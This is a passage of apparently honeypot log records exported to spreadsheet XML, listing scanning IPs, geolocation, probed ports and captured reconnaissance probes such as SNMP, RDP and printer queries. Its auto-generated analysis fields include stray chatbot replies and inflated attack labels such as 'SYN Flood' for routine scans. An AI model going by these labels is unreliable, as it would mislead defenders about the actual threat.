    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dfcd:3dde"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="6"/>
    <x v="6"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:40:03"/>
    <d v="2025-04-24T00:01:45"/>
    <d v="2025-04-30T23:40:03"/>
    <n v="387"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H38"/>
    <s v="3306&amp;&amp;33823&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="137899"/>
    <s v="I LAYER LIMITED"/>
    <s v="I LAYER LIMITED"/>
    <s v="business"/>
    <s v="Vapeline Technology"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ade:188b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze or describe any possible malicious activity. &amp;&amp; There is insufficient data to analyze, indicating no malicious activity has been detected so far. No connections or attempts have been logged. This could be due to lack of traffic or effective security measures. &amp;&amp; This log indicates an attempt to access Microsoft SQL Server using a default or unknown connection method, suggesting potential unauthorized database access. The lack of specified credentials may indicate a brute-force attack or attempted exploitation of a vulnerability. Further investigation is needed to determine the nature and intent behind this activity. &amp;&amp; Attempt to exploit database vulnerability, possibly attempting unauthorized access or SQL injection. Data seems to be related to Microsoft SQL Server. Activity appears to be reconnaissance for potential attack. &amp;&amp; This indicates an attempt to access MySQL database without specifying a specific database, which could be a reconnaissance or scanning activity. _x000a_It may be an initial step by attackers before attempting to exploit vulnerabilities. _x000a_The lack of specific database query suggests the attacker is probing the system for potential entry points. &amp;&amp; No malicious activity detected for MySQL service."/>
    <s v="There is no log data provided to analyze. Can you please provide the actual log data for me to assist with naming the types of attacks? &amp;&amp; I'd be happy to help analyze the log data, but since there is no log data provided, I'll wait for the actual data. Please provide the log data and I'll be able to assist you with naming the type of attack in a short phrase (max 2 words). &amp;&amp; SQL Inject &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="7"/>
    <x v="7"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:39:19"/>
    <d v="2023-12-01T07:42:00"/>
    <d v="2025-04-30T23:39:19"/>
    <n v="692"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Email Spoofing"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_NTP_H24&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_LDAP_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;53073&amp;&amp;161&amp;&amp;389&amp;&amp;21&amp;&amp;143&amp;&amp;27515&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;443&amp;&amp;445&amp;&amp;23&amp;&amp;5900&amp;&amp;51561&amp;&amp;NA&amp;&amp;110&amp;&amp;3389&amp;&amp;1433&amp;&amp;51878&amp;&amp;5432&amp;&amp;3306&amp;&amp;55703&amp;&amp;6667&amp;&amp;80&amp;&amp;52969&amp;&amp;49790&amp;&amp;51967&amp;&amp;55325&amp;&amp;57192&amp;&amp;59240&amp;&amp;54399&amp;&amp;54829&amp;&amp;53455&amp;&amp;51791"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="101"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA&amp;&amp;command&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,59284)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,59290)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,65468)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yHHzpByOc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aqeqpY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DQizNk'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64100)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,62562)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,62570)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EvSIkINcM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hIEXBJkAa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xOamVn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aofCby'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xrPbTaAAr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aSIsSS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VpPigo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64376)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64382)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64384)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qimjPtBBC'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1fb0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No malicious activity detected, socket is not being used. No connection attempt or packet received, indicating no interaction with service. Socket status is unknown due to lack of data available. &amp;&amp; No significant malicious activity detected as SOCKS5 protocol is not specified, indicating no relevant information was found for this connection. _x000a_This could be due to the service being down or inactive at that point. _x000a_It's also possible the scanner didn't support it or simply skipped it. &amp;&amp; This log indicates an attempt to access or exploit a service for potential malicious purposes, possibly as part of a reconnaissance phase. It suggests the target is trying to gather information about the system's configuration or identify vulnerabilities. The lack of specific details in the log implies that the activity was likely at an early stage of exploitation. &amp;&amp; Unknown client attempted to access PJL (Printer Job Language) service. This may indicate an attempt to exploit printer or printing system vulnerabilities. The lack of further information suggests the activity was likely reconnaissance or a scan. &amp;&amp; Potential malicious activity involves an attacker sending a command to gather information about the system. The command is likely used for reconnaissance or enumeration purposes. It may be part of a larger attack to gain access to sensitive data or exploit vulnerabilities. &amp;&amp; Potential malicious activity: The system has been accessed using a print job command, which could be used to exploit vulnerabilities or spread malware through the network. This behavior is often associated with printer-based attacks and may indicate unauthorized access. It may also be an attempt to exploit a known vulnerability in a print service. &amp;&amp; The log suggests possible malicious activity involving unauthorized printer control commands, potentially used for spreading malware or exploiting vulnerabilities through printer ports. This could be an attempt to access and manipulate the printer's internal settings or inject malicious code. The command is not a standard print job request. &amp;&amp; Possible malicious activity detected, an unknown command is being executed with printer job (PJL) protocol to gather information about the system's printer settings and possibly exploit vulnerabilities. This behavior could be indicative of reconnaissance or lateral movement attempts by attackers. &amp;&amp; Malicious activity detected, potentially a printer attack with malicious printing of identification information to the system. _x000a_The attacker is sending a specific command to gather device details. The goal might be to harvest sensitive data from connected devices. &amp;&amp; Possible malicious activity involves an attempt to send printer job information for unknown or malicious purposes, possibly using it as a vector for further exploitation or data exfiltration. &amp;&amp; Malicious attempts to exploit printer services, possibly for unauthorized access or data extraction. The attempt is likely a reconnaissance probe to gather information about the target system's configuration. This could be part of a larger attack to compromise the system further. &amp;&amp; This log suggests a printer spooler buffer overflow attack, where an attacker is attempting to inject malicious code into the printer system through a specific command. The attacker is sending a formatted printer control language string with malicious intent. This could potentially lead to unauthorized access or system compromise. &amp;&amp; No log data provided, cannot analyze malicious activity."/>
    <s v="Proxy Attack &amp;&amp; SYN Flood"/>
  </r>
  <r>
    <x v="8"/>
    <x v="8"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:39:13"/>
    <d v="2023-12-03T18:53:00"/>
    <d v="2025-04-30T23:39:13"/>
    <n v="336"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;389&amp;&amp;143&amp;&amp;54766&amp;&amp;21&amp;&amp;5432&amp;&amp;1080&amp;&amp;3306&amp;&amp;9100&amp;&amp;56934&amp;&amp;1433&amp;&amp;110&amp;&amp;161&amp;&amp;6379&amp;&amp;NA&amp;&amp;5900&amp;&amp;3389&amp;&amp;80&amp;&amp;1521&amp;&amp;53303&amp;&amp;53659"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="101"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yulNZc'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uOSYcyjeD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fwhhbg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JihDcI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hMlDUKjKQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wGcWei'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DmhcNo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FHhOTOQKj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PlTsHg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UbYJng'}}&amp;&amp;{Data_POP3:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f9c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="Potential brute-force login attempt on an IMAP service, possibly trying to exploit weak passwords or identify vulnerable accounts. The CAPABILITY command is being sent to gather information about the server capabilities. This could be a reconnaissance step in a larger malicious operation."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="9"/>
    <x v="9"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:28:24"/>
    <d v="2023-07-29T11:30:48"/>
    <d v="2025-04-30T23:28:24"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="22&amp;&amp;5900&amp;&amp;80&amp;&amp;1080&amp;&amp;389&amp;&amp;445&amp;&amp;53&amp;&amp;23565&amp;&amp;23&amp;&amp;51434"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2003-04-17"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd9d:c182"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="10"/>
    <x v="10"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:12:48"/>
    <d v="2023-07-25T13:09:44"/>
    <d v="2025-04-30T23:12:48"/>
    <n v="1275"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_SNMP_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;9100&amp;&amp;23&amp;&amp;110&amp;&amp;3306&amp;&amp;5432&amp;&amp;80&amp;&amp;143&amp;&amp;21&amp;&amp;63348&amp;&amp;1433&amp;&amp;5900&amp;&amp;389&amp;&amp;1080&amp;&amp;NA&amp;&amp;1521&amp;&amp;3389&amp;&amp;445&amp;&amp;51557&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cUfwVaPAg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=swKKeJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tymSWE'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WppYMi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GFQDdB'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.23,60690)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HYqKMssYq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yBGvvX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WPoHYK'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: 